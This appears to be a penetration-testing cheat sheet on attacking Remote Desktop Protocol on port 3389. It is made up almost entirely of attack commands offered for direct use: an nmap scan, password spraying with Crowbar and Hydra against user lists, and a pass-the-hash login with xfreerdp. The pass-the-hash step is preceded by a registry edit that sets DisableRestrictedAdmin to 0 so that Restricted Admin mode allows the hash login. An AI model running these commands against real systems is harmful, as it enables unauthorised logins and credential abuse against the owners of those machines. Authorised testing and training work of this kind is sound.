Remote Desktop Protocol (RDP)

Default port: 3389

Enumeration

nmap -Pn -p3389 192.168.2.143

Password Spraying

Crowbar

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

Hydra

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

RDP Pass-the-Hash (PtH)

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
xfreerdp /v:<TARGET-IP> /u:<USERNAME> /pth:<HASH>

Last updated